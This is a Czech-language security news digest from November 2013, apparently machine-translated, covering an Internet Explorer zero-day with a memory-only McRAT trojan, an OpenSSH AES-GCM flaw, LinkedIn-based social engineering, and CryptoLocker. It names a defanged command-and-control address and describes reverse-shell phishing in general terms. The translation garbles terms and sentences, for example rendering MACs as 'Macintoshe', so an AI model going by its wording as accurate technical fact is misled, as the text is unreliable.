Zatím FireEye řekl, že nový IE nula den je omezena na tomto jednom nejmenovaném webových stránek, které na rozdíl od jiných útoků zalévání děr, není špičatý s nebezpečným iframe nebo přesměrování napadených počítačů k útočníkovi kontrolované stránky, kde se stáhne další malware. Místo toho je shell kód přímo vstřikován do paměti, což je nový twist na tyto typy cílených útoků.
"Při použití paměti pouze metody, útok je mimořádně obtížné pro sítě obránce rozpoznat, když se snaží zkoumat a potvrzení, které koncové body jsou infikovány, za použití tradičních disků založených na forenzní metody," řekl Kindlund.
Škodlivý náklad prochází řadou kroků, než je spuštěn, včetně tří úrovní XOR dekódování před McRAT varianty, které jsou jako Trojan.APT.9002, přebírá infikovaný počítač. Tyto různé druhy kódování a dekódování větší složitost, která by mohla zmařit tradiční detekčních technologií, Kindlund a dodal, že malware je také poměrně lehký což znamená, že oběť by ničeho nevšiml děje na svém počítači.
Vstříknutím malware do paměti, ale nemá představovat určité omezení na útočníky. Nedostatek vytrvalosti, například, znamená, že útočník musí exfiltrate dat rychle, než je stroj restartován uživatelem, která by zničila Trojan z paměti.
"To znamená, že útočník musí rychle dostat do infikovaného koncového bodu a exfiltrate dat nebo přesunout příčně v ohrožení sítě dříve, než je koncový bod je restartován / Reset, "řekl Kindlund. "Pokud koncový bod restartuje nebo obnoví, pak malware úplně vymazán z koncového bodu a útočník bude muset znovu infikovat systém znovu."
"Případně může být použití tohoto netrvalými první fázi naznačují, že útočníci byli jisti, že jejich určené cíle by se jednoduše znovu ohrožena webové stránky a znovu napaden," řekl FireEye.
Výběrem tento způsob infekce, také omezuje množství automatizace podílí, Kindlund řekl.
"Tento druh činnosti vyžaduje man-moc, protože to se zdá, že útočník otočil exploit" zapnuto "a" vypnuto "v bude v průběhu této kampaně, aby se omezil počet infikovaných systémů, protože neměli správné zdroje měřítko a automatizovat tuto část útoku (to bylo všechno člověk řízený), "řekl Kindlund. "V důsledku otáčení exploit" zapnuto "a" vypnuto ", je také sítě Obráncovy práce těžší ověřit útok stále dochází v průběhu celé kampaně."
Tato verze Trojan.APT.9002 připojuje k velení a řízení serveru umístěného na 111 [.] 68. [.] 9. [.] 93 používá port 443, FireEye řekl, když to používá jiný protokol pro komunikaci, než předchozí verze. Vědci byli také schopni dát dohromady, z analýzy MD5 hash, že sdílí chování jiných McRAT variant, včetně domény dll [.] Freshdns [.] Org používá v DeputyDog kampaně.
"Věříme, že existuje souvislost mezi tímto kampaně a DeputyDog, ale nemáme dostatek důkazů potvrdit, že hrozba herec je ve stejné," řekl Kindlund. "Možné teorie v této době je to, že: 1). Existuje více, související hrozby herci opětovné stejnou infrastrukturu nebo 2) je to stejné ohrožení herec zodpovídal za kampaní"
OpenSSH Opravy poškození paměti chybná aktualizace
11.11.2013 Šifrování | Zranitelnosti
Vývojáři stojící za OpenSSH, koupelnou s připojením nástrojů, které pomáhá uživatelům šifrovat přenos na internetových zasedání uznala a záplatované přes víkend, že poškození paměti chyba zabezpečení existuje v některých verzích hlavního apartmá.
Pokud využívány, chyba zabezpečení by mohla, které lze nalézt v obou 6.2 a 6.3 sestavení OpenSSH, vedou k ověřeným chyby spuštění kódu, podle bezpečnostní poradenství na stránkách skupiny.
Hlavní problém pramení z post-autentizace sshd procesu a AES-GCM šifrovaných při výměně klíčů. SSHD nebyl inicializaci autentizační kód zprávy (MAC) a "vyčištění zpětné volání ještě byl vyvolán během re-klíčování provozu."
Hash založené na autentizační kódy zpráv (Macintoshe) dovolit sshd lepší bezpečnost díky ochraně integrity dat.
V tomto případě se však MAC se bude používat a adresa, která byla volána zpět se z předchozí dávky haldy obsahu.
Poradní nároky OpenBSD, který se rozvíjet sadu, opravil problém "pre-zatížení haldy s užitečným callback adresa" a prosazením adresa-prostorovém uspořádání randomizace (ASLR) k sshd a sdílených knihoven záleží na.
Vývojáři jsou povzbudivé uživatelům buď zakázat nepříjemné šifru, použít opravu - k dispozici na stránkách skupiny , nebo přejděte k OpenSSH 6.4 , který byl propuštěn v pátek.
Řešení potíží se zabezpečením, byla rychlá otočka pro OpenSSH. Markus Friedl, německý programátor a vývojář OpenSSH našel chybu a oznámil to jen den předtím, ve čtvrtek.
Hackeři objevili nové díry v Internet Exploreru a Office
11.11.2013 Zranitelnosti
Uživatelé starších softwarových produktů Microsoftu by se měli mít na pozoru. Byly totiž objeveny doposud nevyužité možnosti napadení, tzv. zero day exploit, a to u Internet Exploreru verzí 7, 8, 9 a 10 běžících pod Windows XP a Windows 7 a nezávisle na tom byla o pár dní dříve objevena nová díra také ve Windows Vista, Office 2003, 2010 a podnikových produktech Windows Server 2008 a Lync 2010 a 2013.
Oba případy jsou docela závažné a hrozí u nich zneužití záškodníky, Microsoft totiž ihned nevydal žádnou speciální záplatu skrze Windows Update a s nápravou vyčkává až na pravidelné servisní úterý.
Na nově objevenou bezpečnostní díru v Internet Exploreru upozornil tento víkend FireEye a v jádru se jedná o díry dvě. Jedna umožňuje vniknutí do paměti napadeného počítače s poměrně širokými možnostmi zneužití, druhá je o něco méně závažná a umožní čtení některých systémových informací.
Zatímco objevené chyby v Internet Exploreru jsou docela čerstvé, na ty v Office už Microsoft zareagoval alespoň vydáním manuální opravy. Zranitelnost spočívá ve speciálně upravených souborech TIFF, tedy souborech tvářících se navenek jako obrázky. O to nebezpečnější je jí výskyt v softwaru hojně využívaném v podnicích, kde jsou soubory TIFF běžnou součástí dokumentace. Po otevření napadeného souboru může útočník získat dálkový přístup k počítači se stejnými uživatelskými právy, jako má aktuální uživatelský účet.
Složitost malware Android roste
11.11.2013 Viry | Mobil
259 nových mobilních hrozeb rodiny a varianty stávajících rodin byly objeveny F-Secure Labs ve třetím čtvrtletí roku 2013, podle nového mobilního hrozeb zprávy mezi červencem a zářím 2013. 252 z nich bylo pro Android a 7 Symbian. Toto číslo je nárůst z 205 rodin a variant hrozeb zjištěných ve druhém čtvrtletí.
V dalším kroku pochodu komoditizací malware Android, zprávy se vynořily v červenci sady nástrojů nové Androrat APK pojiva, která zjednodušuje proces vkládání škodlivého kódu do legitimních Android aplikací. A na znamení, že složitost malware Android se zvyšuje, jeden z pěti mobilních hrozeb jsou nyní roboty, uvádí se ve zprávě. Díky bezpečnostní opatření na místě v obchodě Google Play, méně malware hrozby se objevují tam. Místo rostoucí zájem v Google Play je u aplikací, které porušují soukromí coby overcollection dat.
"Lidé pochopili, že je něco sporné o tom dát své informace do velkých objemů dat, ale dávají hodně stejné informace na pochybných aplikací po celou dobu" říká Sean Sullivan, Bezpečnostní poradce F-Secure Labs. "Alespoň se společnostmi jako Google, tam je nějaká odpovědnost a některé zavedené postupy ochrany soukromí. Například když smažete svůj účet služby Gmail, budou mazat data. Ale s těmito malými aplikacemi, nemáte ponětí, co dělají s daty. A víte, co dělají? Jsou prodávat to marketingových sítí, "Sullivan přidán.
CoverMe: Soukromá textových zpráv, sdílení a bezpečné telefonní hovory app
11.11.2013 Bezpečnost | Mobil
CoverMe , bezpečné posílání SMS zpráv, sdílení dokumentů a telefonní hovor aplikace, kterou dnes po beta období.
Mezi vlastnosti patří:
Zkontrolujte, Hlídané telefonovat
Poslat self-destrukci zprávy
Připomeňme nebo vzdáleně vymazat odeslané zprávy
Bezpečně sdílet soukromé fotografie a videa
Foto klenba skrýt fotografií a videí
Skrýt textové zprávy, kontakty, záznamy o hovorech
Vlastní hrobka pro poznámky, dokumenty a deník.
CoverMe poskytuje plnou kontrolu zpráv. Uživatelé budou okamžitě vědět, kdy má příjemce číst jejich zprávy a mohou vyvolat nebo provést vzdálené vymazání zprávy. Pro každého, kdo někdy posílali vlastní obrázek nebo špatně soudil textovou zprávu na někoho omylem, mohou nyní jednoduše vyslat pokyn vzdáleného vymazání odstranit. CoverMe také umožňuje uživatelům vložit zprávy s "sebedestrukce" možností. Poté, co zpráva četl, že to zmizí, nebo po určitou dobu. aplikace také nabízí CoverMe Soukromá Vault, konečný způsob, jak zajistit, osobních kontaktů, zpráv, protokolů hovorů, důvěrné dokumenty, poznámky, tajné deníkových záznamů, obrázků a Videa zůstat skryté a soukromé. šifrovaného úložiště je neviditelný a naprosto neproniknutelné bez hesla. I když je přístroj uživatelů ke ztrátě nebo ponechán bez dozoru, jejich osobní údaje, je naprosto bezpečný. Klenba také poskytuje výkonné správce hesel pro bezpečné uložení všech hesel.
Twitter zneužívání trendy a statistiky
11.11.2013 Sociální sítě | Bezpečnost
Pokud jde o Twitter, lidé stále mají velkou chuť má velký počet falešných následovníků, aby se zdají být populární. Podvodníci se zpeněží na to ve velkém stylu, a dokonce i snižování cen, aby si navzájem konkurují.
Barracuda vydala infographic , že upozorňuje na klíčové statistiky o stavu falešných účtů na Twitteru a dalších útočník trendy. Útočník nástroje a trendy: Automatizované tweets - Most falešné účty automaticky tweet přes Twitter.com namísto použití třetí stranu nebo mobilní aplikace. 98% tweetů z falešných účtů jsou odesílány prostřednictvím twitter.com vs 24% tweetů z reálných účtů. Zdvojené profily - 63% Fake účtů jsou vytvořeny pomocí duplikování profilů od reálných uživatelů. Pokrýváme to podrobněji v tomto blogu od července. Spamování pomocí Twitter seznamy - útočníci obětem přidat do seznamu Twitter získat jejich pozornost, a pak seznam popis inzeruje spam URL. Viděli jsme nové spamové účty přidat více než 90.000 lidí do seznamu během prvních několika hodin stávajících. Klíčové statistiky:
První stat je měřítkem velikosti trhu falešné následovníků. Měříme to jako počet eBay prodejců nabízejících Twitter následovníci na prodej. V současné době existuje 52 prodejců na eBay prodejní následovníků Twitter. To je až z 20 v červnu 2013.
Druhý stat je průměrná cena za tisíc stoupenců. Současná cena je 11 dolarů za tisíc následovníků se z 18 dolarů za tisíc v červnu.
Třetí stat, že ukážeme, tady je měřítkem toho, jak mnozí jeho přívrženci lidé kupují. Průměrný že jsme měřili byla v červnu 52432 následovníci na osobu, která zakoupené falešné následovníky. Teď je to v průměru 48.885.
ENISA vydává doporučení pro zabezpečení dat pomocí šifrování
11.11.2013 Zabezpečení | Šifrování
ENISA, Evropské unie "kybernetická bezpečnost" Agentura zahájila zprávu doporučující, aby všechny orgány by měly lépe podpořit kryptografických opatření na ochranu osobních údajů.
Zpráva se zabývá způsoby, jak chránit citlivé a / nebo osobní údaje, které byly získány legálně. Jasná souvislost mezi ochranou soukromí a kryptografie je podtržen, který ukazuje, jak ten může hrát roli při ochraně osobních údajů a ochrany oprávněně získané citlivé nebo důvěrné informace. Zpráva předkládá mapování požadavcích na zabezpečení osobních údajů a základních kryptografických technik. Je pozoruhodné, že opatření v oblasti bezpečnosti informací a mechanismy mohou být nasazeny na ochranu osobních údajů. Nicméně, informační bezpečnost nepokrývá všechny otázky týkající se ochrany osobních údajů a soukromí. Vskutku, osobní / citlivé dat vyžaduje různá ochranná opatření v různých fázích životního cyklu. Proto zpráva představuje zkrácenou verzi tohoto životního cyklu popisu. Zpráva také uvádí bezpečnostní opatření a úvod do základních kryptografických metod. Zpráva je doplněna souborem technických doporučení pro klíčové algoritmy, velikostí, parametrů a protokolů. . Cílovými skupinami těchto doporučení jsou systémové vývojáři a inženýři údržby v obchodních podmínkách, které se potýkají s potřebou nasadit nebo vyměnit ochranná opatření pro data Mezi prvními třemi závěry a doporučení jsou:
Kryptografického opatření jsou jen jeden kus skládačky když se odkazuje na soukromí a ochranu údajů. Nicméně, šifrovací opatření představují důležitou ochrannou vrstvu pro ochranu dat, které mohou snížit dopad porušení. Relevantní zúčastněné strany (orgány pro ochranu údajů, členské státy EU a orgány, poskytovatelé služeb) by měla doporučit, uživatelů a dalších provedení bezpečnostních opatření pro ochranu osobních údajů, stejně jako spoléhat na stav-of-the-art řešení a konfigurací pro tento účel.
Specializované pracovníci jsou potřebné pro správné provádění aktualizovaných kryptografických ochranných opatření.
Většina organizací nebojí phishingu
11.11.2013 Phishing
ThreatSim vydala své 2013 stát o Phish Awareness Index měřící phishing Výcvik, povědomí a připravenosti mezi 300 IT manažery, správce a odborníků v organizacích v celých Spojených státech. Hlavním závěrem: většina organizací (57%), míra phishingu jako "minimální" Vliv ohrožení (což při vyšetřování a účet resetuje), zatímco jeden ze čtyř respondentů (27%) uvedlo, phishingové útoky, které vedly k "materiál" porušení během posledního roku. Průzkum definován "materiál" jako nějaká forma malware infekce, neoprávněným . přístup a ztracené / ukradené údaje z porušení vázána na phishing Dalším zajímavým zjištěním je, že šedesát procent (60%) všech respondentů uvedlo, phishingové útoky zaměřené na jejich organizaci se každým rokem roste, přesto většina organizací nicnedělání provádět phishing školení a programy na zvýšení povědomí (25%), nebo používání neefektivních technik, včetně e-mailových oznámení, webové semináře a v-osoba vzdělávání (69%). Nápor průběžných titulků ukázat phishing účinnosti je živá a stejně jako jeden z nejvíce aktivní, rostoucí a konzistentní ohrožení vektorů, a stav Phish zjištění ukazují, že většina organizací stále ještě nejsou aktivní nebo při efektivní postoj trénovat koncových uživatelů o tom, jak se dostat phishingu. Další klíčové závěry z indexu patří:
30% všech respondentů plánuje zvýšit rozpočtové bezpečnostní školení a zvyšování povědomí v roce 2014.
70% všech respondentů uvedlo, neměří jejich organizace expozici phishing.
60% všech respondentů, viz míru phishing každým rokem roste, ale jen 30 procent je měření jejich vystavení ohrožení.
Out-of-date třetí party software na desktopech je třeba pohlížet jako další hrozba, vektoru. Index nalezeno 44% všech respondentů nejsou formálně řídící třetí strany software, což představuje oslabení organizační schopnosti, aby se zabránilo poškození spojené s útoky typu phishing.
Fake LinkedIn profil setkání informace pro cílené útoky
11.11.2013 Hacking | Kriminalita
Sociální sítě jsou velkým zdrojem informací pro počítačové zločince a skvělý způsob, jak vstoupit do kruhu potenciálních obětí důvěry. Probíhající sociální inženýrství zaměřenou na cílovou skupinu uživatelů LinkedIn byl pomocí "profesionální" sociální síť popularizovat konkrétní seznamka, ale podle Websense pro výzkumníky, konečným cílem kampaně je pravděpodobné, zlověstnější. útočníci vytvořili falešnou LinkedIn účet pod jménem Jessica Reinsch, která má v současné době více než 400 spojení, a je používán i pro zobrazení profilů potenciálních cílů a vést je, aby výše uvedené seznamka ("Pro mladší dámy a pánové zralé"):
"Funkce vyhledávání v rámci sociální sítě poskytují snadný způsob pro podvodníky a oprávněných uživatelů LinkedIn pro zvětšení na jejich cílové publikum," výzkumníci poukazují . "Ať už jste náborář hledá potenciální kandidáty, seznamka podvodník hledali" zralé gentlemanů ", nebo pokročilé Útočník hledá vysoce postavených ředitelů v rámci jednotlivých průmyslových odvětví, LinkedIn uživatelé mají přístup k nástrojům, které vám vylepšit své hledání." V Aby bylo možné udělat efektivněji, podvodníci se ujistit, aby dotyčný účet premium účet, který jim umožňuje vyhledávat uživatelům na základě jejich pracovní funkci, seniority úrovni a velikosti podniku - všechny informace, které mohou přijít vhod pro budoucí sociální inženýrství útoky. "Všimněte si, že funkce Premium konto také napomoci větší míru interakce s cíli. Pokud cíl zobrazit profil podvod, může podvodník pak vidět, že pro všechna zobrazení. Podvodník může se také obrátit na kteréhokoliv člena LinkedIn a prohledávat větší množství profilů, "výzkumníci přidat. Výzkumní pracovníci se domnívají, že podvodníci používají seznamka jako návnada. Poukázali na to, že místo nemá v současné době sportovat škodlivého kódu, ale jeho IP adresa byla dříve spojena s oblastí, které se, stejně jako na číslo autonomního systému (ASN), že v jednom okamžiku, který je součástí C & C URL pro počet Exploit sad. To vše nasvědčuje tomu, že kampaň je daleko od neškodný, a že to je pravděpodobně jen se zlými úmysly Scheme "průzkum" fáze. Jen v případě, že badatelé profil na LinkedIn.
Americké agenturní zaměstnanci nechat vynalezl žena odborníka do sítě
11.11.2013 Bezpečnost
Ještě jednou a více okázale, bezpečnostní výzkumníci prokázali, že útočníci třímající falešný LinkedIn účet sportovní image atraktivní žena tvrdí, že je odborníkem v oboru počítačové bezpečnosti může oklamat i bezpečnostní vědomi, že zaměstnanci se nechat jejich stráž dolů. Cyberdefense specialista Aamir Lakhani a jeho tým z World Wide technologii za úkol proniknout nejmenovaný americký vládní agenturu, jejíž zaměstnanci jsou prý velmi cybersecurity-aware, a oni se rozhodli udělat tomu přes fake účtů sociálních sítí pod názvem "Emily Williams." Zlepšení na výzkumu provedeném odborným bezpečnostní Thomas Ryan v roce 2009 a 2010, který úspěšně podvedeni asi 300 bezpečnostních specialistů, vojenský personál a smluvní dodavatele bezpečnostních sdílet osobní a důvěrné obchodní informace s vymyšleným kybernetické Hottie Robin Sage , kteří se s nimi prostřednictvím sociálních médií účtů Lakhani a jeho tým hlouběji (nebo vyšší, jak to bylo). Robin Sage falešný příroda byla uznána poměrně málo cílů, jako její tvrzení o absolvování MIT a pracuje 10 let u kybernetické bezpečnosti (přesto, že je jen 25 let ) byl zamítnut jako nepravděpodobná a nemůže být neověřené prostřednictvím on-line záznamy nebo MIT Absolventská síť. Lakhani, jehož "Emily Williams" také prohlašoval, že absolvent MIT, se snažil tento problém vyřešit tím, že informace o ní na různých internetových stránkách, vyslání do její jméno na MIT fórech, a tak dále. Emily Williams weaselled její cestu do cílové agentury tím, že prohlásí na LinkedIn a Facebook, že byl najat tím. Podle zprávy Lucian Constantin jí trvalo pouhých 15 hodin na více než 55 spojů Facebook a LinkedIn spojení s pracovníky z cílové organizace a jejích dodavatelů. Ona také získala tři nabídky zaměstnání v průběhu prvních 24 hodin si byl přítomen na těchto sociálních sítích. Jak čas ubíhal, pes zaměstnancům nabídnuto, aby jí pomohl se dostat pracovní notebook a přístup k agentury síti rychlejší (výzkumníci přijat, ale použít ani). Po nastavení nastraženou výbušninou stránky s vánoční a vyslání odkaz na něj na svých sociálních médií účty, mnoho agenturní zaměstnanci navštívil místo a byli podvedeni umožňuje reverzní shell má být otevřen do svých počítačů, které umožňují výzkumníkům do jejich počítače a síť agentury, kde přičichl hesla, ukradl dokumenty, a tak dále. Dokonce se podařilo narušit systém vedoucího informační bezpečnosti v agentuře - přestože ho nemají sociální média účty. Oni dělali, že zjistil, že dotyčná osoba měla narozeniny blíží a posílat jemu elektronické blahopřání k narozeninám s nebezpečným odkaz e-mailem. Nejhorší na tom je, že tento experiment trval po dobu tří měsíců, i když se vědci podařilo udělat to vše v jen týden -. což znamená, že útok nebo Emily pravá povaha byly objeveny na tak dlouho Lakhani říká, že tento typ útoku penetrační testování byl kopírován ostatním společnostem ve finanční a zdravotnické průmysly, a výsledky byly prakticky stejné. " Pokaždé, když je sociální inženýrství v našich penetračních testů máme stoprocentní úspěšnost, "řekl, a to je něco, co by dělat starosti všem. Obtíže při řešení tohoto problému, je mnoho. Za prvé, lidé jsou (příliš) důvěřiví a ochotní pomáhat druhým, říká Lakhani. Za druhé, lidé s nízkým společnosti nebo agentury hierarchie nečekejte být cílené, protože se nepovažují za jejich pozice dost důležité, a nejsou si vědomi, že většina útočníků obvykle začít své invazím zaměřené speciálně na tyto "ponížené" zaměstnanců. Konečně, (většinou) mužské pracovní síly v IT průmyslu je jednoznačně méně obezřetní, pokud jde o pomoc atraktivní žena - stejný experiment prováděn prostřednictvím mužské sociální mediální profil nebyl úspěšný. Lakhani také poukázal na to, že pro útoky sociálního inženýrství, které mají být spatřen zaměstnanců, školení povědomí o bezpečnosti musí být provedeny dostatečně často, aby se jim vyvinout instinkt pro to. Ostatní věci, které mohou organizace udělat pro ochranu svých zaměstnanců a jejich síť z tohoto typu útoků je vytvořit účinný systém podávání zpráv o těchto útoků - jeden která vám umožní další zaměstnanci vědí, že útok probíhá a jaké formě to znamená -. stejně jako segmentovat své sítě a omezit přístup zaměstnanců k datům zaměstnanců, na druhé straně, by se měly zdržet sdílení práce související informace na sociálních sítích a používat pracovní prostředky pro osobní aktivity, společné Lakhani na RSA Conference Europe 2013 se konalo minulý týden v Amsterdamu.
Nová zdravotní bezpečnost a soukromí certifikaci od (ISC) 2
11.11.2013 Zabezpečení
(ISC) 2 zahájila novou certifikaci, zdravotnický informační bezpečnost a soukromí Practitioner ( HCISPPSM ), první základním globální standard pro posouzení jak informační bezpečnosti a soukromí odbornost v odvětví zdravotnictví.
Pověření je určen k poskytování zdravotní péče by zaměstnavatelé a osoby v průmyslu s validací, že zdravotní bezpečnost a soukromí lékař má základní úroveň znalostí a zkušeností požadovaných průmyslem při řešení konkrétních bezpečnostních problémů. Stejně jako u všech svých pověřovacích listin, (ISC) 2 prováděny práce úkolem analýza (JTA) studii, která určí rozsah a obsah pověření HCISPP programu. Předmět odborníci z (ISC) 2 členství a další průmyslová svítidla z organizací v Evropě, Hongkongu, a ve Spojených státech se zúčastnili několika seminářů zkoušku rozvoje a přispívá k rozvoji společného souboru znalostí (CBK), která slouží jako základ pro pověření. HCISPP je prokázání znalosti o bezpečnosti a soukromí praktiky týkající se řádných kontrol na ochranu soukromí a zabezpečení citlivých informací pacienta zdraví, jakož i jejich závazek k výkonu povolání zdravotnického soukromí. je základním pověření, které odráží mezinárodně uznávané standardy praxe pro bezpečnost zdravotnických informací a soukromí. Pro vedoucí pracovníky odpovědné za ochranu citlivých údajů o zdravotní péči, HCISPP ukazuje aktivní závazek k zajištění organizace dělá potřebné investice do lidských zdrojů v oblasti informační bezpečnosti. K dosažení HCISPP, žadatelé musí mít nejméně dva roky zkušeností v jedné oblasti znalostí o pověření, která zahrnuje bezpečnost, dodržování a soukromí. Právní praxe může být nahrazen za dodržování a správu informací zkušenost může být substituted pro soukromí. Jeden ze dvou let zkušeností, musí být v oblasti zdravotnictví. Všichni kandidáti musí být schopen prokázat, kompetence v každé z těchto šesti ČBK oblasti, aby bylo dosaženo HCISPP:
Zdravotnictví
Regulační prostředí
Soukromí a bezpečnost ve zdravotnictví
Informace Správa a řízení rizik
Informace o hodnocení rizik
Třetí strana řízení rizik.
Google testuje novou funkci Chrome pro zamezení podvodů, pluginy
11.11.2013 Ochrana | Zabezpečení
Nová funkce, která byla přidána do Canary Google je nastaven uživatelům pomoci odstranit změny uskutečňované malware, který spíná na jejich domovské stránce, nebo píchne reklamy do míst jejich procházení. "Obnovit nastavení prohlížeče" tlačítka se snadno a rychle obnovit nastavení prohlížeče, aby jejich původní výchozí, a bude to skvělé pro případy, kdy se jedná malware brání uživatelům měnit nastavení. "On-line zločinci roste jejich použití škodlivého softwaru, který může tiše únosu nastavení svého prohlížeče. Zlí hoši přimět vás k instalaci a spuštění tohoto druhu softwaru svazování to s něčím, co budete chtít, stejně jako bezplatné spořiče obrazovky, videa nebo plugin-ironický má aktualizace zabezpečení, "Linus Upson, viceprezident pro inženýrství společnosti Google, vysvětlil v blogu. Tlačítko se nachází v "Advanced Settings" v nastavení prohlížeče Chrome. Pokud je tato funkce funguje tak, jak má a nemá "zlomit" Google Kanárské ostrovy - prohlížeč kanál určený pro vývojáře k testování nových funkcí - to bude brzy součástí stabilní verzi. Upson bohužel nezmiňuje, zda je výše uvedené "Obnovit prohlížeče nastavení "funkce bude také moci odinstalovat malware, který je upravený, nebo pokud tomu tak není, jak se mají na mysli, aby se zabránilo škodlivému softwaru uskutečnění změny znovu. Udělal dodat, že současná Kanárské sestavení je rovněž aktivně a automaticky blokuje škodlivý ke stažení, přidávat k těm blokovány Safe Browsing programu, který příznaky podezření webové stránky.
Cryptolocker přepětí přímo svázané s Blackhole pádu
11.11.2013 Šifrování | Viry
Nedávný nástup Cryptolocker jako jeden z nejrozšířenějších, viditelné a smrtící hrozby je přímo vázána k zatčení "břicho", tvůrce nechvalně Blackhole Exploit výstroje a cool. Jak se dalo předpokládat, od jeho zatčení na začátku října, dva Sady - z nichž Blackhole byl nejpoužívanější jeden - zastavit přijímání aktualizací a exploity, které ovládal dostal zatuchlá, což kity mnohem méně účinné nástroje, než předtím. Cyber podvodníci, jejichž cílem je pokračovat v distribuci malwaru museli najít novou cestu, a to Ukázalo se, že Upatre downloader Trojan. "Zjistili jsme, že botnet Cutwail zodpovědný za hlavní Blackhole Exploit Kit spamu běží začal posílat ven vede účetní Upatre (což v konečném důsledku vede k CryptoLocker) zhruba v říjnu stejný měsíc břichem zatčení "Trend Micro vědci sdílené . "Ve skutečnosti jsme se sledovat více IP adresy spojené s přechodem - zasílání Blackhole Exploit Kit spam krátce před zatčením a odesílání spamu CryptoLocker po zatčení." Upatre downloader je obvykle dodáván jako malware přílohy v nevyžádaných e-mailů. Má jen jeden cíl, a dělá to dobře: to stáhne a spustí soubor z webového serveru ohrožena, a pak skončí. Kdysi se, že by stažení hlavně Zeus varianty, ale teď Cryptolocker se obvykle dodává místo. "Cutwail botnet má schopnost vyslat velmi vysokého počtu spamových zpráv, což vysvětluje vysoký výskyt této nedávné spinu v ransomware" Vědci poukázal. "Zdůrazňuje také, poněkud zvráceně, jak odolné počítačová kriminalita může být: odpověď na břicho odchodu byla pozoruhodně rychlá a může skončit až ovlivňuje více lidí, než oni měli předtím."
Malware analytici pravidelně vyšetřovat nezveřejněných narušení dat
11.11.2013 Viry
ThreatTrack Security publikoval studii , která odhaluje montáž kybernetické výzev v rámci amerických podniků. Téměř 6 do 10 malware analytiků uvedlo, že byly vyšetřeny nebo řešit narušení dat, která nebyla nikdy zveřejněny v jejich společnosti.
Tyto výsledky naznačují, že údaje porušení epidemie - celkem 621 potvrzených narušení dat v roce 2012, v závislosti na 2013 Verizon narušení dat Vyšetřování zpráva - může být výrazně podhodnocen, takže zákazníci podniků a jejich sdílení údajů partneři vědomi širokou škálu potenciální bezpečnostní rizika spojená se ztrátou osobní nebo chráněných informací. Navíc, největší společnosti, osoby s více než 500 zaměstnanci, jsou ještě více pravděpodobné, že měli nehlášeného porušení, s 66% malwaru analytiků s podniky této velikosti zpravodajské nezveřejněné narušení dat. Nezávislý průzkum slepý 200 bezpečnostních profesionálů zabývající se malware analýza v amerických podniků, bylo provedeno Stanovisko věcech jménem ThreatTrack bezpečnosti v říjnu 2013. Kromě znepokojivě vysoký počet odhalených narušení dat hlášených, studie upozorňuje na několik dalších výzev podniku kybernetické profesionálů tvář. "I když je to odrazuje, že tolik malware analytici jsou si vědomi narušení dat, které podniky nebyly zveřejněny, není divu, že k uvedenému porušování dochází, "uvedl generální ředitel Julian ThreatTrack Waits, Sr" Každý den, malware se stává složitější a americké podniky jsou neustále terčem kybernetických špionážních kampaní ze zámořských konkurentů a zahraničními vládami. Tato studie ukazuje, že malware analytici jsou plně uvědomuje hrozby, kterým čelí, a zatímco mnoho z nich podávat zprávu o pokroku v jejich schopnosti boje proti kybernetické útoky, ale také poukázat na nedostatky ve zdrojích a nástroje. " 40% respondentů uvedlo, že jedním z nejobtížnějších aspektů bránil jejich sítě organizace byla skutečnost, že nemají dostatek vysoce kvalifikovaných bezpečnostní personál na zaměstnance. Zhorší záležitosti, je jejich čas strávený často řešení se snadno vyhnout malware infekce vznikající na nejvyšších úrovních jejich organizace. Na těchto sazeb analytici malware odhalil přístroj používaný člena jejich užšího vedení se stal napaden škodlivým vlivem vedení :
Návštěva pornografické webové stránky (40%)
Kliknutím na nebezpečný odkaz v e-mailu phishing (56%)
Povolení rodinný příslušník použít ve vlastní zařízení (45%)
Instalace škodlivý mobilní aplikace (33%).
Když žádal, aby poznal z nejobtížnějších aspektů při zajišťování ochrany sítě svých firem v pokročilém malware, 67% uvedlo, že složitost malware je hlavním faktorem, 67% uvedlo, že objem útoky škodlivého softwaru, a 58% uvedlo neúčinnost anti-malware řešení , které kladou důraz na zásadní význam mnohovrstevná, pokročilé počítačové obrany. Více než polovina (52%) všech malware analytiků uvedla, že obvykle trvá jim déle než 2 hodiny analyzovat nový malware vzorek. Naopak, pouze 4% uvedlo, že jsou schopny analyzovat nový malware vzorek za méně než hodinu. Není divu, že 35% uvedlo, že jedním z nejobtížnějších aspektů bránit svou organizaci v pokročilém malware je nedostatečný přístup k automatizované řešení malware analýzy, který odpojí analýzy časy během několika minut.
Co se stalo s SANS reklamy?
11.11.2013 IT
Možná jste si všimli, že "reklama" rám používáme v pravém horním rohu je prázdný posledních pár dnů. Zvláštní je, že jsme nedostali spoustu stížností, o tom ;-)
Důvod je poměrně jednoduchý: Sans inzeráty jsou zahrnuty přes iframe. Nicméně, iframe, jak Smit B. Shah uvedl v e-mailu na SANS webmaster, může být také použit v clickjacking útoky. Tak jsme se rozhodli implementovat jednoduchý anti-clickjacking obranu přidáním "X-Frame-Options: SAMEORIGIN "hlavičky všech sans.org stránkách. Samozřejmě, "isc.sans.edu" není "sameorigin" a reklamy se nebudou zobrazovat Pokud váš prohlížeč podporuje záhlaví.
Ano, jsou zde Javascript triky, aby se zabránilo clickjacking, ale nejsou zdaleka spolehlivé. Pokud stále vidět reklamy: Pravděpodobně jste měli používat novější prohlížeč. Samozřejmě, že budeme osvobodit některé stránky (jako reklam ;-)) z hlavičky v budoucnu, ale teď usoudil, že přidání záhlaví je důležitější než zobrazování reklam.
OpenSSH zabezpečení
11.11.2013 Zranitelnosti
OpenSSH oznámil, že OpenSSH 6.2 a 6,3 jsou náchylné k ověřeným chyby spuštění kódu. Tato chyba ovlivňuje AES-GCM šifry. Jako rychlé řešení, můžete zakázat šifru (viz URL níže). Nebo můžete přejít na OpenSSH 6.4.
Uživatel může obejít omezení uvalená na uživatele účtu tím, že využívá chybu, ale uživatel potřebuje platná pověření využít vady.
[1] http://www.openssh.com/txt/gcmrekey.adv
Další lekce Edwarda Snowdena o bezpečnosti
11.11.2013 Bezpečnost
Bývalý externista NSA se podle Routers k citlivým datům dostával pomocí přihlašovacích údajů více než 20 zaměstnanců.
Každá další informace uveřejněná o případu Edwarda Snowdena a jeho působení v NSA je neobyčejně cennou lekcí z bezpečnostní problematiky ve velkých firmách. V novém dílu této již takřka mýdlové opery jihoamerického ražení se dozvídáme o praktikách, které umožnily přístup k datům, která jsou jinak vyhrazena pouze pro nejpřísněji prověřené pracovníky.
